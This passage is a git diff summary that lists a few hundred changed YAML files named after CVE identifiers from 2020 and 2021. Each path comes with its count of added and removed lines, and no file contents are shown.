| 2 +- http/cves/2020/CVE-2020-15227.yaml | 2 +- http/cves/2020/CVE-2020-15500.yaml | 2 +- http/cves/2020/CVE-2020-15505.yaml | 2 +- http/cves/2020/CVE-2020-15568.yaml | 4 ++-- http/cves/2020/CVE-2020-15867.yaml | 4 ++-- http/cves/2020/CVE-2020-15895.yaml | 2 +- http/cves/2020/CVE-2020-15920.yaml | 4 ++-- http/cves/2020/CVE-2020-16139.yaml | 4 ++-- http/cves/2020/CVE-2020-16846.yaml | 4 ++-- http/cves/2020/CVE-2020-16952.yaml | 8 ++++---- http/cves/2020/CVE-2020-17362.yaml | 2 +- http/cves/2020/CVE-2020-17453.yaml | 5 +++-- http/cves/2020/CVE-2020-17456.yaml | 2 +- http/cves/2020/CVE-2020-17463.yaml | 2 +- http/cves/2020/CVE-2020-17496.yaml | 4 ++-- http/cves/2020/CVE-2020-17505.yaml | 4 ++-- http/cves/2020/CVE-2020-17506.yaml | 4 ++-- http/cves/2020/CVE-2020-17518.yaml | 4 ++-- http/cves/2020/CVE-2020-17519.yaml | 2 +- http/cves/2020/CVE-2020-17526.yaml | 2 +- http/cves/2020/CVE-2020-17530.yaml | 4 ++-- http/cves/2020/CVE-2020-18268.yaml | 2 +- http/cves/2020/CVE-2020-19282.yaml | 2 +- http/cves/2020/CVE-2020-19283.yaml | 2 +- http/cves/2020/CVE-2020-19295.yaml | 2 +- http/cves/2020/CVE-2020-19360.yaml | 2 +- http/cves/2020/CVE-2020-1943.yaml | 4 ++-- http/cves/2020/CVE-2020-19515.yaml | 2 +- http/cves/2020/CVE-2020-1956.yaml | 2 +- http/cves/2020/CVE-2020-19625.yaml | 4 ++-- http/cves/2020/CVE-2020-20285.yaml | 2 +- http/cves/2020/CVE-2020-20300.yaml | 2 +- http/cves/2020/CVE-2020-2036.yaml | 4 ++-- http/cves/2020/CVE-2020-2096.yaml | 2 +- http/cves/2020/CVE-2020-20982.yaml | 2 +- http/cves/2020/CVE-2020-20988.yaml | 2 +- http/cves/2020/CVE-2020-21012.yaml | 4 ++-- http/cves/2020/CVE-2020-2103.yaml | 2 +- http/cves/2020/CVE-2020-21224.yaml | 2 +- http/cves/2020/CVE-2020-2140.yaml | 2 +- http/cves/2020/CVE-2020-22208.yaml | 4 ++-- http/cves/2020/CVE-2020-22209.yaml | 4 ++-- http/cves/2020/CVE-2020-22210.yaml | 4 ++-- http/cves/2020/CVE-2020-22211.yaml | 4 ++-- http/cves/2020/CVE-2020-22840.yaml | 2 +- http/cves/2020/CVE-2020-23015.yaml | 2 +- http/cves/2020/CVE-2020-23517.yaml | 2 +- http/cves/2020/CVE-2020-23575.yaml | 4 ++-- http/cves/2020/CVE-2020-23697.yaml | 2 +- http/cves/2020/CVE-2020-23972.yaml | 4 ++-- http/cves/2020/CVE-2020-24148.yaml | 18 +++++++----------- http/cves/2020/CVE-2020-24186.yaml | 4 ++-- http/cves/2020/CVE-2020-24223.yaml | 2 +- http/cves/2020/CVE-2020-24312.yaml | 4 ++-- http/cves/2020/CVE-2020-24391.yaml | 4 ++-- http/cves/2020/CVE-2020-24550.yaml | 4 ++-- http/cves/2020/CVE-2020-24571.yaml | 2 +- http/cves/2020/CVE-2020-24579.yaml | 2 +- http/cves/2020/CVE-2020-24589.yaml | 2 +- http/cves/2020/CVE-2020-24701.yaml | 2 +- http/cves/2020/CVE-2020-24902.yaml | 4 ++-- http/cves/2020/CVE-2020-24903.yaml | 4 ++-- http/cves/2020/CVE-2020-24912.yaml | 2 +- http/cves/2020/CVE-2020-24949.yaml | 2 +- http/cves/2020/CVE-2020-25078.yaml | 4 ++-- http/cves/2020/CVE-2020-25213.yaml | 4 ++-- http/cves/2020/CVE-2020-25223.yaml | 4 ++-- http/cves/2020/CVE-2020-25495.yaml | 2 +- http/cves/2020/CVE-2020-25506.yaml | 4 ++-- http/cves/2020/CVE-2020-2551.yaml | 4 ++-- http/cves/2020/CVE-2020-25540.yaml | 4 ++-- http/cves/2020/CVE-2020-25780.yaml | 4 ++-- http/cves/2020/CVE-2020-25864.yaml | 4 ++-- http/cves/2020/CVE-2020-26153.yaml | 2 +- http/cves/2020/CVE-2020-26214.yaml | 2 +- http/cves/2020/CVE-2020-26217.yaml | 2 +- http/cves/2020/CVE-2020-26248.yaml | 2 +- http/cves/2020/CVE-2020-26258.yaml | 4 ++-- http/cves/2020/CVE-2020-26413.yaml | 4 ++-- http/cves/2020/CVE-2020-26876.yaml | 2 +- http/cves/2020/CVE-2020-26919.yaml | 4 ++-- http/cves/2020/CVE-2020-26948.yaml | 2 +- http/cves/2020/CVE-2020-27191.yaml | 2 +- http/cves/2020/CVE-2020-2733.yaml | 4 ++-- http/cves/2020/CVE-2020-27361.yaml | 2 +- http/cves/2020/CVE-2020-27467.yaml | 2 +- http/cves/2020/CVE-2020-27481.yaml | 4 ++-- http/cves/2020/CVE-2020-27735.yaml | 4 ++-- http/cves/2020/CVE-2020-27866.yaml | 2 +- http/cves/2020/CVE-2020-27982.yaml | 2 +- http/cves/2020/CVE-2020-27986.yaml | 4 ++-- http/cves/2020/CVE-2020-28185.yaml | 4 ++-- http/cves/2020/CVE-2020-28188.yaml | 4 ++-- http/cves/2020/CVE-2020-28208.yaml | 4 ++-- http/cves/2020/CVE-2020-28351.yaml | 2 +- http/cves/2020/CVE-2020-28871.yaml | 2 +- http/cves/2020/CVE-2020-28976.yaml | 2 +- http/cves/2020/CVE-2020-29164.yaml | 2 +- http/cves/2020/CVE-2020-29227.yaml | 2 +- http/cves/2020/CVE-2020-29284.yaml | 4 ++-- http/cves/2020/CVE-2020-29395.yaml | 2 +- http/cves/2020/CVE-2020-29453.yaml | 4 ++-- http/cves/2020/CVE-2020-29583.yaml | 2 +- http/cves/2020/CVE-2020-29597.yaml | 4 ++-- http/cves/2020/CVE-2020-3187.yaml | 4 ++-- http/cves/2020/CVE-2020-3452.yaml | 6 +++--- http/cves/2020/CVE-2020-35234.yaml | 2 +- http/cves/2020/CVE-2020-35338.yaml | 2 +- http/cves/2020/CVE-2020-35476.yaml | 2 +- http/cves/2020/CVE-2020-35489.yaml | 2 +- http/cves/2020/CVE-2020-35580.yaml | 4 ++-- http/cves/2020/CVE-2020-35598.yaml | 2 +- http/cves/2020/CVE-2020-35713.yaml | 2 +- http/cves/2020/CVE-2020-35729.yaml | 4 ++-- http/cves/2020/CVE-2020-35736.yaml | 2 +- http/cves/2020/CVE-2020-35749.yaml | 2 +- http/cves/2020/CVE-2020-35774.yaml | 2 +- http/cves/2020/CVE-2020-3580.yaml | 2 +- http/cves/2020/CVE-2020-35846.yaml | 4 ++-- http/cves/2020/CVE-2020-35847.yaml | 4 ++-- http/cves/2020/CVE-2020-35848.yaml | 4 ++-- http/cves/2020/CVE-2020-35951.yaml | 2 +- http/cves/2020/CVE-2020-35984.yaml | 2 +- http/cves/2020/CVE-2020-35985.yaml | 2 +- http/cves/2020/CVE-2020-35986.yaml | 2 +- http/cves/2020/CVE-2020-35987.yaml | 2 +- http/cves/2020/CVE-2020-36112.yaml | 2 +- http/cves/2020/CVE-2020-36289.yaml | 4 ++-- http/cves/2020/CVE-2020-36365.yaml | 4 ++-- http/cves/2020/CVE-2020-36510.yaml | 2 +- http/cves/2020/CVE-2020-4463.yaml | 4 ++-- http/cves/2020/CVE-2020-5191.yaml | 2 +- http/cves/2020/CVE-2020-5192.yaml | 2 +- http/cves/2020/CVE-2020-5284.yaml | 2 +- http/cves/2020/CVE-2020-5307.yaml | 4 ++-- http/cves/2020/CVE-2020-5405.yaml | 2 +- http/cves/2020/CVE-2020-5410.yaml | 4 ++-- http/cves/2020/CVE-2020-5412.yaml | 4 ++-- http/cves/2020/CVE-2020-5775.yaml | 2 +- http/cves/2020/CVE-2020-5776.yaml | 2 +- http/cves/2020/CVE-2020-5777.yaml | 4 ++-- http/cves/2020/CVE-2020-5847.yaml | 2 +- http/cves/2020/CVE-2020-5902.yaml | 2 +- http/cves/2020/CVE-2020-6171.yaml | 2 +- http/cves/2020/CVE-2020-6207.yaml | 2 +- http/cves/2020/CVE-2020-6287.yaml | 2 +- http/cves/2020/CVE-2020-6308.yaml | 2 +- http/cves/2020/CVE-2020-6637.yaml | 4 ++-- http/cves/2020/CVE-2020-6950.yaml | 4 ++-- http/cves/2020/CVE-2020-7107.yaml | 2 +- http/cves/2020/CVE-2020-7136.yaml | 2 +- http/cves/2020/CVE-2020-7209.yaml | 4 ++-- http/cves/2020/CVE-2020-7318.yaml | 2 +- http/cves/2020/CVE-2020-7796.yaml | 2 +- http/cves/2020/CVE-2020-7943.yaml | 2 +- http/cves/2020/CVE-2020-7961.yaml | 2 +- http/cves/2020/CVE-2020-7980.yaml | 4 ++-- http/cves/2020/CVE-2020-8115.yaml | 2 +- http/cves/2020/CVE-2020-8163.yaml | 4 ++-- http/cves/2020/CVE-2020-8191.yaml | 2 +- http/cves/2020/CVE-2020-8193.yaml | 6 +++--- http/cves/2020/CVE-2020-8194.yaml | 2 +- http/cves/2020/CVE-2020-8209.yaml | 2 +- http/cves/2020/CVE-2020-8497.yaml | 2 +- http/cves/2020/CVE-2020-8512.yaml | 2 +- http/cves/2020/CVE-2020-8515.yaml | 4 ++-- http/cves/2020/CVE-2020-8615.yaml | 4 ++-- http/cves/2020/CVE-2020-8641.yaml | 2 +- http/cves/2020/CVE-2020-8644.yaml | 4 ++-- http/cves/2020/CVE-2020-8654.yaml | 2 +- http/cves/2020/CVE-2020-8771.yaml | 4 ++-- http/cves/2020/CVE-2020-8772.yaml | 4 ++-- http/cves/2020/CVE-2020-8813.yaml | 4 ++-- http/cves/2020/CVE-2020-8982.yaml | 2 +- http/cves/2020/CVE-2020-9036.yaml | 2 +- http/cves/2020/CVE-2020-9043.yaml | 2 +- http/cves/2020/CVE-2020-9047.yaml | 4 ++-- http/cves/2020/CVE-2020-9054.yaml | 4 ++-- http/cves/2020/CVE-2020-9315.yaml | 4 ++-- http/cves/2020/CVE-2020-9344.yaml | 2 +- http/cves/2020/CVE-2020-9376.yaml | 4 ++-- http/cves/2020/CVE-2020-9402.yaml | 2 +- http/cves/2020/CVE-2020-9425.yaml | 2 +- http/cves/2020/CVE-2020-9483.yaml | 2 +- http/cves/2020/CVE-2020-9484.yaml | 4 ++-- http/cves/2020/CVE-2020-9496.yaml | 4 ++-- http/cves/2020/CVE-2020-9757.yaml | 4 ++-- http/cves/2021/CVE-2021-1472.yaml | 4 ++-- http/cves/2021/CVE-2021-1497.yaml | 4 ++-- http/cves/2021/CVE-2021-1498.yaml | 4 ++-- http/cves/2021/CVE-2021-1499.yaml | 4 ++-- http/cves/2021/CVE-2021-20031.yaml | 2 +- http/cves/2021/CVE-2021-20038.yaml | 4 ++-- http/cves/2021/CVE-2021-20090.yaml | 4 ++-- http/cves/2021/CVE-2021-20091.yaml | 2 +- http/cves/2021/CVE-2021-20092.yaml | 4 ++-- http/cves/2021/CVE-2021-20114.yaml | 2 +- http/cves/2021/CVE-2021-20123.yaml | 2 +- http/cves/2021/CVE-2021-20124.yaml | 2 +- http/cves/2021/CVE-2021-20137.yaml | 2 +- http/cves/2021/CVE-2021-20150.yaml | 2 +- http/cves/2021/CVE-2021-20158.yaml | 2 +- http/cves/2021/CVE-2021-20167.yaml | 4 ++-- http/cves/2021/CVE-2021-20323.yaml | 4 ++-- http/cves/2021/CVE-2021-20792.yaml | 2 +- http/cves/2021/CVE-2021-20837.yaml | 2 +- http/cves/2021/CVE-2021-21087.yaml | 4 ++-- http/cves/2021/CVE-2021-21234.yaml | 2 +- http/cves/2021/CVE-2021-21287.yaml | 4 ++-- http/cves/2021/CVE-2021-21307.yaml | 4 ++-- http/cves/2021/CVE-2021-21311.yaml | 4 ++-- http/cves/2021/CVE-2021-21315.yaml | 4 ++-- http/cves/2021/CVE-2021-21345.yaml | 2 +- http/cves/2021/CVE-2021-21351.yaml | 4 ++-- http/cves/2021/CVE-2021-21389.yaml | 4 ++-- http/cves/2021/CVE-2021-21402.yaml | 2 +- http/cves/2021/CVE-2021-21479.yaml | 2 +- http/cves/2021/CVE-2021-21745.yaml | 4 ++-- http/cves/2021/CVE-2021-21799.yaml | 2 +- http/cves/2021/CVE-2021-21800.yaml | 2 +- http/cves/2021/CVE-2021-21801.yaml | 2 +- http/cves/2021/CVE-2021-21802.yaml | 2 +- http/cves/2021/CVE-2021-21803.yaml | 2 +- http/cves/2021/CVE-2021-21805.yaml | 2 +- http/cves/2021/CVE-2021-21816.yaml | 2 +- http/cves/2021/CVE-2021-21881.yaml | 4 ++-- http/cves/2021/CVE-2021-21972.yaml | 4 ++-- http/cves/2021/CVE-2021-21973.yaml | 2 +- http/cves/2021/CVE-2021-21975.yaml | 4 ++-- http/cves/2021/CVE-2021-21978.yaml | 4 ++-- http/cves/2021/CVE-2021-21985.yaml | 4 ++-- http/cves/2021/CVE-2021-22005.yaml | 4 ++-- http/cves/2021/CVE-2021-22053.yaml | 4 ++-- http/cves/2021/CVE-2021-22054.yaml | 4 ++-- http/cves/2021/CVE-2021-22122.yaml | 2 +- http/cves/2021/CVE-2021-22145.yaml | 4 ++-- http/cves/2021/CVE-2021-22205.yaml | 4 ++-- http/cves/2021/CVE-2021-22214.yaml | 4 ++-- http/cves/2021/CVE-2021-22502.yaml | 2 +- http/cves/2021/CVE-2021-22707.yaml | 4 ++-- http/cves/2021/CVE-2021-22873.yaml | 2 +- http/cves/2021/CVE-2021-22911.yaml | 4 ++-- http/cves/2021/CVE-2021-22986.yaml | 4 ++-- http/cves/2021/CVE-2021-23241.yaml | 2 +- http/cves/2021/CVE-2021-24145.yaml | 4 ++-- http/cves/2021/CVE-2021-24146.yaml | 4 ++-- http/cves/2021/CVE-2021-24150.yaml | 4 ++-- http/cves/2021/CVE-2021-24155.yaml | 2 +- http/cves/2021/CVE-2021-24165.yaml | 4 ++-- http/cves/2021/CVE-2021-24169.yaml | 4 ++-- http/cves/2021/CVE-2021-24176.yaml | 2 +- http/cves/2021/CVE-2021-24210.yaml | 4 ++-- http/cves/2021/CVE-2021-24214.yaml | 2 +- http/cves/2021/CVE-2021-24215.yaml | 4 ++-- http/cves/2021/CVE-2021-24226.yaml | 4 ++-- http/cves/2021/CVE-2021-24227.yaml | 4 ++-- http/cves/2021/CVE-2021-24235.yaml | 4 ++-- http/cves/2021/CVE-2021-24236.yaml | 2 +- http/cves/2021/CVE-2021-24237.yaml | 4 ++-- http/cves/2021/CVE-2021-24239.yaml | 4 ++-- http/cves/2021/CVE-2021-24245.yaml | 2 +- http/cves/2021/CVE-2021-24274.yaml | 2 +- http/cves/2021/CVE-2021-24275.yaml | 2 +- http/cves/2021/CVE-2021-24276.yaml | 2 +- http/cves/2021/CVE-2021-24278.yaml | 4 ++-- http/cves/2021/CVE-2021-24284.yaml | 4 ++-- http/cves/2021/CVE-2021-24285.yaml | 4 ++-- http/cves/2021/CVE-2021-24286.yaml | 2 +- http/cves/2021/CVE-2021-24287.yaml | 2 +- http/cves/2021/CVE-2021-24288.yaml | 4 ++-- http/cves/2021/CVE-2021-24291.yaml | 4 ++-- http/cves/2021/CVE-2021-24298.yaml | 2 +- http/cves/2021/CVE-2021-24300.yaml | 4 ++-- http/cves/2021/CVE-2021-24316.yaml | 4 ++-- http/cves/2021/CVE-2021-24320.yaml | 2 +- http/cves/2021/CVE-2021-24335.yaml | 4 ++-- http/cves/2021/CVE-2021-24340.yaml | 2 +- http/cves/2021/CVE-2021-24342.yaml | 4 ++-- http/cves/2021/CVE-2021-24347.yaml | 4 ++-- http/cves/2021/CVE-2021-24351.yaml | 2 +- http/cves/2021/CVE-2021-24358.yaml | 2 +- http/cves/2021/CVE-2021-24364.yaml | 2 +- http/cves/2021/CVE-2021-24370.yaml | 4 ++-- http/cves/2021/CVE-2021-24387.yaml | 2 +- http/cves/2021/CVE-2021-24389.yaml | 2 +- http/cves/2021/CVE-2021-24406.yaml | 2 +- http/cves/2021/CVE-2021-24407.yaml | 2 +- http/cves/2021/CVE-2021-24409.yaml | 2 +- http/cves/2021/CVE-2021-24435.yaml | 2 +- http/cves/2021/CVE-2021-24436.yaml | 2 +- http/cves/2021/CVE-2021-24452.yaml | 2 +- http/cves/2021/CVE-2021-24472.yaml | 2 +- http/cves/2021/CVE-2021-24488.yaml | 2 +- http/cves/2021/CVE-2021-24495.yaml | 2 +- http/cves/2021/CVE-2021-24498.yaml | 2 +- http/cves/2021/CVE-2021-24499.yaml | 2 +- http/cves/2021/CVE-2021-24510.yaml | 2 +- http/cves/2021/CVE-2021-24554.yaml | 4 ++-- http/cves/2021/CVE-2021-24627.yaml | 4 ++-- http/cves/2021/CVE-2021-24647.yaml | 2 +- http/cves/2021/CVE-2021-24666.yaml | 2 +- http/cves/2021/CVE-2021-24731.yaml | 2 +- http/cves/2021/CVE-2021-24746.yaml | 2 +- http/cves/2021/CVE-2021-24750.yaml | 2 +- http/cves/2021/CVE-2021-24762.yaml | 4 ++-- http/cves/2021/CVE-2021-24791.yaml | 2 +- http/cves/2021/CVE-2021-24827.yaml | 2 +- http/cves/2021/CVE-2021-24838.yaml | 2 +- http/cves/2021/CVE-2021-24862.yaml | 2 +- http/cves/2021/CVE-2021-24875.yaml | 2 +- http/cves/2021/CVE-2021-24891.yaml | 2 +- http/cves/2021/CVE-2021-24910.yaml | 2 +- http/cves/2021/CVE-2021-24915.yaml | 4 ++-- http/cves/2021/CVE-2021-24917.yaml | 2 +- http/cves/2021/CVE-2021-24926.yaml | 2 +- http/cves/2021/CVE-2021-24931.yaml | 2 +- http/cves/2021/CVE-2021-24940.yaml | 2 +- http/cves/2021/CVE-2021-24946.yaml | 4 ++-- http/cves/2021/CVE-2021-24947.yaml | 4 ++-- http/cves/2021/CVE-2021-24956.yaml | 2 +- http/cves/2021/CVE-2021-24970.yaml | 2 +- http/cves/2021/CVE-2021-24979.yaml | 2 +- http/cves/2021/CVE-2021-24987.yaml | 2 +- http/cves/2021/CVE-2021-24991.yaml | 2 +- http/cves/2021/CVE-2021-24997.yaml | 2 +- http/cves/2021/CVE-2021-25003.yaml | 4 ++-- http/cves/2021/CVE-2021-25008.yaml | 2 +- http/cves/2021/CVE-2021-25016.yaml | 2 +- http/cves/2021/CVE-2021-25028.yaml | 2 +- http/cves/2021/CVE-2021-25033.yaml | 2 +- http/cves/2021/CVE-2021-25052.yaml | 4 ++-- http/cves/2021/CVE-2021-25055.yaml | 2 +- http/cves/2021/CVE-2021-25063.yaml | 2 +- http/cves/2021/CVE-2021-25065.yaml | 2 +- http/cves/2021/CVE-2021-25067.yaml | 2 +- http/cves/2021/CVE-2021-25074.yaml | 2 +- http/cves/2021/CVE-2021-25075.yaml | 2 +- http/cves/2021/CVE-2021-25078.yaml | 2 +- http/cves/2021/CVE-2021-25079.yaml | 2 +- http/cves/2021/CVE-2021-25085.yaml | 2 +- http/cves/2021/CVE-2021-25099.yaml | 2 +- http/cves/2021/CVE-2021-25104.yaml | 4 ++-- http/cves/2021/CVE-2021-25111.yaml | 2 +- http/cves/2021/CVE-2021-25112.yaml | 2 +- http/cves/2021/CVE-2021-25114.yaml | 2 +- http/cves/2021/CVE-2021-25118.yaml | 2 +- http/cves/2021/CVE-2021-25120.yaml | 2 +- http/cves/2021/CVE-2021-25281.yaml | 4 ++-- http/cves/2021/CVE-2021-25296.yaml | 4 ++-- http/cves/2021/CVE-2021-25297.yaml | 4 ++-- http/cves/2021/CVE-2021-25298.yaml | 4 ++-- http/cves/2021/CVE-2021-25299.yaml | 2 +- http/cves/2021/CVE-2021-25646.yaml | 4 ++-- http/cves/2021/CVE-2021-25864.yaml | 4 ++-- http/cves/2021/CVE-2021-25899.yaml | 4 ++-- http/cves/2021/CVE-2021-26084.yaml | 4 ++-- http/cves/2021/CVE-2021-26085.yaml | 2 +- http/cves/2021/CVE-2021-26086.yaml | 2 +- http/cves/2021/CVE-2021-26247.yaml | 2 +- http/cves/2021/CVE-2021-26294.yaml | 4 ++-- http/cves/2021/CVE-2021-26295.yaml | 4 ++-- http/cves/2021/CVE-2021-26475.yaml | 2 +- http/cves/2021/CVE-2021-26598.yaml | 2 +- http/cves/2021/CVE-2021-26702.yaml | 2 +- http/cves/2021/CVE-2021-26710.yaml | 2 +- http/cves/2021/CVE-2021-26723.yaml | 2 +- http/cves/2021/CVE-2021-26812.yaml | 4 ++-- http/cves/2021/CVE-2021-26855.yaml | 8 ++++---- http/cves/2021/CVE-2021-27124.yaml | 4 ++-- http/cves/2021/CVE-2021-27132.yaml | 2 +- http/cves/2021/CVE-2021-27309.yaml | 2 +- http/cves/2021/CVE-2021-27310.yaml | 2 +- http/cves/2021/CVE-2021-27314.yaml | 4 ++-- http/cves/2021/CVE-2021-27315.yaml | 2 +- http/cves/2021/CVE-2021-27316.yaml | 2 +- http/cves/2021/CVE-2021-27319.yaml | 2 +- http/cves/2021/CVE-2021-27320.yaml | 2 +- http/cves/2021/CVE-2021-27330.yaml | 2 +- http/cves/2021/CVE-2021-27358.yaml | 2 +- http/cves/2021/CVE-2021-27519.yaml | 2 +- http/cves/2021/CVE-2021-27520.yaml | 2 +- http/cves/2021/CVE-2021-27561.yaml | 4 ++-- http/cves/2021/CVE-2021-27651.yaml | 4 ++-- http/cves/2021/CVE-2021-27670.yaml | 4 ++-- http/cves/2021/CVE-2021-27850.yaml | 4 ++-- http/cves/2021/CVE-2021-27905.yaml | 4 ++-- http/cves/2021/CVE-2021-27909.yaml | 2 +- http/cves/2021/CVE-2021-27931.yaml | 4 ++-- http/cves/2021/CVE-2021-28149.yaml | 4 ++-- http/cves/2021/CVE-2021-28150.yaml | 4 ++-- http/cves/2021/CVE-2021-28151.yaml | 4 ++-- http/cves/2021/CVE-2021-28169.yaml | 4 ++-- http/cves/2021/CVE-2021-28377.yaml | 2 +- http/cves/2021/CVE-2021-28419.yaml | 2 +- http/cves/2021/CVE-2021-28918.yaml | 4 ++-- http/cves/2021/CVE-2021-28937.yaml | 4 ++-- http/cves/2021/CVE-2021-29006.yaml | 2 +- http/cves/2021/CVE-2021-29156.yaml | 2 +- http/cves/2021/CVE-2021-29200.yaml | 8 +++++--- http/cves/2021/CVE-2021-29203.yaml | 2 +- http/cves/2021/CVE-2021-29441.yaml | 4 ++-- http/cves/2021/CVE-2021-29442.yaml | 4 ++-- http/cves/2021/CVE-2021-29484.yaml | 4 ++-- http/cves/2021/CVE-2021-29490.yaml | 2 +- http/cves/2021/CVE-2021-29505.yaml | 2 +- http/cves/2021/CVE-2021-29622.yaml | 4 ++-- http/cves/2021/CVE-2021-29625.yaml | 4 ++-- http/cves/2021/CVE-2021-3002.yaml | 2 +- http/cves/2021/CVE-2021-30049.yaml | 2 +- http/cves/2021/CVE-2021-30128.yaml | 4 ++-- http/cves/2021/CVE-2021-30134.yaml | 4 ++-- http/cves/2021/CVE-2021-30151.yaml | 4 ++-- http/cves/2021/CVE-2021-3017.yaml | 4 ++-- http/cves/2021/CVE-2021-30175.yaml | 2 +- http/cves/2021/CVE-2021-3019.yaml | 2 +- http/cves/2021/CVE-2021-30213.yaml | 2 +- http/cves/2021/CVE-2021-30461.yaml | 4 ++-- http/cves/2021/CVE-2021-30497.yaml | 2 +- http/cves/2021/CVE-2021-3110.yaml | 4 ++-- http/cves/2021/CVE-2021-31195.yaml | 4 ++-- http/cves/2021/CVE-2021-31249.yaml | 2 +- http/cves/2021/CVE-2021-31250.yaml | 2 +- http/cves/2021/CVE-2021-3129.yaml | 4 ++-- http/cves/2021/CVE-2021-31537.yaml | 4 ++-- http/cves/2021/CVE-2021-31581.yaml | 2 +- http/cves/2021/CVE-2021-31589.yaml | 2 +- http/cves/2021/CVE-2021-31602.yaml | 4 ++-- http/cves/2021/CVE-2021-31682.yaml | 4 ++-- http/cves/2021/CVE-2021-31755.yaml | 4 ++-- http/cves/2021/CVE-2021-31805.yaml | 2 +- http/cves/2021/CVE-2021-31856.yaml | 4 ++-- http/cves/2021/CVE-2021-31862.yaml | 2 +- http/cves/2021/CVE-2021-32030.yaml | 4 ++-- http/cves/2021/CVE-2021-32172.yaml | 4 ++-- http/cves/2021/CVE-2021-3223.yaml | 2 +- http/cves/2021/CVE-2021-32305.yaml | 4 ++-- http/cves/2021/CVE-2021-32618.yaml | 4 ++-- http/cves/2021/CVE-2021-32682.yaml | 4 ++-- http/cves/2021/CVE-2021-32789.yaml | 4 ++-- http/cves/2021/CVE-2021-32819.yaml | 4 ++-- http/cves/2021/CVE-2021-32820.yaml | 6 +++--- http/cves/2021/CVE-2021-32853.yaml | 4 ++-- http/cves/2021/CVE-2021-3293.yaml | 2 +- http/cves/2021/CVE-2021-3297.yaml | 2 +- http/cves/2021/CVE-2021-33044.yaml | 2 +- http/cves/2021/CVE-2021-33221.yaml | 4 ++-- http/cves/2021/CVE-2021-33357.yaml | 4 ++-- http/cves/2021/CVE-2021-33544.yaml | 2 +- http/cves/2021/CVE-2021-33564.yaml | 4 ++-- http/cves/2021/CVE-2021-33690.yaml | 2 +- http/cves/2021/CVE-2021-3374.yaml | 4 ++-- http/cves/2021/CVE-2021-3377.yaml | 2 +- http/cves/2021/CVE-2021-3378.yaml | 4 ++-- http/cves/2021/CVE-2021-33807.yaml | 2 +- http/cves/2021/CVE-2021-33851.yaml | 2 +- http/cves/2021/CVE-2021-33904.yaml | 4 ++-- http/cves/2021/CVE-2021-34370.yaml | 2 +- http/cves/2021/CVE-2021-34429.yaml | 2 +- http/cves/2021/CVE-2021-34473.yaml | 8 ++++---- http/cves/2021/CVE-2021-34621.yaml | 2 +- http/cves/2021/CVE-2021-34640.yaml | 2 +- http/cves/2021/CVE-2021-34643.yaml | 2 +- http/cves/2021/CVE-2021-34805.yaml | 2 +- http/cves/2021/CVE-2021-35250.yaml | 4 ++-- http/cves/2021/CVE-2021-35265.yaml | 2 +- http/cves/2021/CVE-2021-35323.yaml | 2 +- http/cves/2021/CVE-2021-35336.yaml | 4 ++-- http/cves/2021/CVE-2021-35380.yaml | 2 +- http/cves/2021/CVE-2021-35395.yaml | 2 +- http/cves/2021/CVE-2021-35464.yaml | 4 ++-- http/cves/2021/CVE-2021-35488.yaml | 2 +- http/cves/2021/CVE-2021-35587.yaml | 2 +- http/cves/2021/CVE-2021-3577.yaml | 4 ++-- http/cves/2021/CVE-2021-36260.yaml | 4 ++-- http/cves/2021/CVE-2021-36356.yaml | 4 ++-- http/cves/2021/CVE-2021-36380.yaml | 4 ++-- http/cves/2021/CVE-2021-36450.yaml | 2 +- http/cves/2021/CVE-2021-3654.yaml | 2 +- http/cves/2021/CVE-2021-36580.yaml | 2 +- http/cves/2021/CVE-2021-36748.yaml | 2 +- http/cves/2021/CVE-2021-36749.yaml | 4 ++-- http/cves/2021/CVE-2021-36873.yaml | 2 +- http/cves/2021/CVE-2021-37216.yaml | 2 +- http/cves/2021/CVE-2021-37304.yaml | 4 ++-- http/cves/2021/CVE-2021-37305.yaml | 4 ++-- http/cves/2021/CVE-2021-37416.yaml | 2 +- http/cves/2021/CVE-2021-37538.yaml | 4 ++-- http/cves/2021/CVE-2021-37573.yaml | 2 +- http/cves/2021/CVE-2021-37580.yaml | 4 ++-- http/cves/2021/CVE-2021-37589.yaml | 4 ++-- http/cves/2021/CVE-2021-37704.yaml | 6 +++--- http/cves/2021/CVE-2021-37833.yaml | 2 +- http/cves/2021/CVE-2021-38314.yaml | 2 +- http/cves/2021/CVE-2021-38540.yaml | 6 +++--- http/cves/2021/CVE-2021-38647.yaml | 4 ++-- http/cves/2021/CVE-2021-38702.yaml | 4 ++-- http/cves/2021/CVE-2021-38704.yaml | 2 +- http/cves/2021/CVE-2021-38751.yaml | 2 +- http/cves/2021/CVE-2021-39141.yaml | 2 +- http/cves/2021/CVE-2021-39144.yaml | 2 +- http/cves/2021/CVE-2021-39146.yaml | 2 +- http/cves/2021/CVE-2021-39152.yaml | 2 +- http/cves/2021/CVE-2021-39165.yaml | 4 ++-- http/cves/2021/CVE-2021-39211.yaml | 2 +- http/cves/2021/CVE-2021-39226.yaml | 2 +- http/cves/2021/CVE-2021-39312.yaml | 4 ++-- http/cves/2021/CVE-2021-39316.yaml | 2 +- http/cves/2021/CVE-2021-39320.yaml | 2 +- http/cves/2021/CVE-2021-39322.yaml | 2 +- http/cves/2021/CVE-2021-39327.yaml | 6 +++--- http/cves/2021/CVE-2021-39350.yaml | 2 +- http/cves/2021/CVE-2021-39433.yaml | 2 +- http/cves/2021/CVE-2021-39501.yaml | 2 +- http/cves/2021/CVE-2021-40149.yaml | 4 ++-- http/cves/2021/CVE-2021-40150.yaml | 4 ++-- http/cves/2021/CVE-2021-40323.yaml | 4 ++-- http/cves/2021/CVE-2021-40438.yaml | 6 +++--- http/cves/2021/CVE-2021-40539.yaml | 2 +- http/cves/2021/CVE-2021-40542.yaml | 2 +- http/cves/2021/CVE-2021-40661.yaml | 2 +- http/cves/2021/CVE-2021-40822.yaml | 4 ++-- http/cves/2021/CVE-2021-40856.yaml | 4 ++-- http/cves/2021/CVE-2021-40859.yaml | 2 +- http/cves/2021/CVE-2021-40868.yaml | 2 +- http/cves/2021/CVE-2021-40870.yaml | 4 ++-- http/cves/2021/CVE-2021-40875.yaml | 4 ++-- http/cves/2021/CVE-2021-40908.yaml | 4 ++-- http/cves/2021/CVE-2021-40960.yaml | 2 +- http/cves/2021/CVE-2021-40968.yaml | 2 +- http/cves/2021/CVE-2021-40969.yaml | 2 +- http/cves/2021/CVE-2021-40970.yaml | 2 +- http/cves/2021/CVE-2021-40971.yaml | 2 +- http/cves/2021/CVE-2021-40972.yaml | 2 +- http/cves/2021/CVE-2021-40973.yaml | 2 +- http/cves/2021/CVE-2021-40978.yaml | 4 ++-- http/cves/2021/CVE-2021-41174.yaml | 4 ++-- http/cves/2021/CVE-2021-41192.yaml | 2 +- 